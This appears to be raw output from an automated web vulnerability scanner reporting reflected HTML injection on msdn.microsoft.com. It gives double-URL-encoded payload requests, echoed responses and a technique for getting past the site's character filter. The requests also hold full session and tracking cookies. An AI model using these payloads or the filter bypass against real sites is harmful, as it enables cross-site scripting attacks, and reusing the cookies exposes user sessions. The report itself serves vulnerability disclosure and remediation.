Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10038
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms123402(l=MSDN.10).aspx?missingurl=/en-us/library/dd582938(v/x3doffice.11&92bbc"><a>62955b61670=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6483a%2522%253e%253ca%253e8800823c465 was submitted in the REST URL parameter 1. This input was echoed as 6483a"><a>8800823c465 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us6483a%2522%253e%253ca%253e8800823c465/library/dd582938(v=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us6483a"><a>8800823c465/library/dd582938(v=office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d55f6%2522%253e%253ca%253efdd48321b4d was submitted in the REST URL parameter 2. This input was echoed as d55f6"><a>fdd48321b4d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryd55f6%2522%253e%253ca%253efdd48321b4d/dd582938(v=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd55f6"><a>fdd48321b4d/dd582938(v=office.11" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e49d%2522%253e%253ca%253e35d14fe12fc was submitted in the REST URL parameter 3. This input was echoed as 6e49d"><a>35d14fe12fc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v6e49d%2522%253e%253ca%253e35d14fe12fc=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v6e49d"><a>35d14fe12fc=office.11" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8440%2522%253e%253ca%253e0f47febd4eb was submitted in the REST URL parameter 1. This input was echoed as c8440"><a>0f47febd4eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc8440%2522%253e%253ca%253e0f47febd4eb/library/dd582938(v=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:22 GMT
Content-Length: 9200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc8440"><a>0f47febd4eb/library/dd582938(v=office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc86%2522%253e%253ca%253e3e864514c0b was submitted in the REST URL parameter 2. This input was echoed as efc86"><a>3e864514c0b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryefc86%2522%253e%253ca%253e3e864514c0b/dd582938(v=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:54 GMT
Content-Length: 9200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryefc86"><a>3e864514c0b/dd582938(v=office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14105%2522%253e%253ca%253e4aaafa655d was submitted in the REST URL parameter 3. This input was echoed as 14105"><a>4aaafa655d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd582938(v14105%2522%253e%253ca%253e4aaafa655d=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:58:24 GMT Content-Length: 9198
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v14105"><a>4aaafa655d=office.11)" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edda6%2522%253e%253ca%253e6e9b407ad3c was submitted in the REST URL parameter 1. This input was echoed as edda6"><a>6e9b407ad3c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usedda6%2522%253e%253ca%253e6e9b407ad3c/library/dd582939(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; 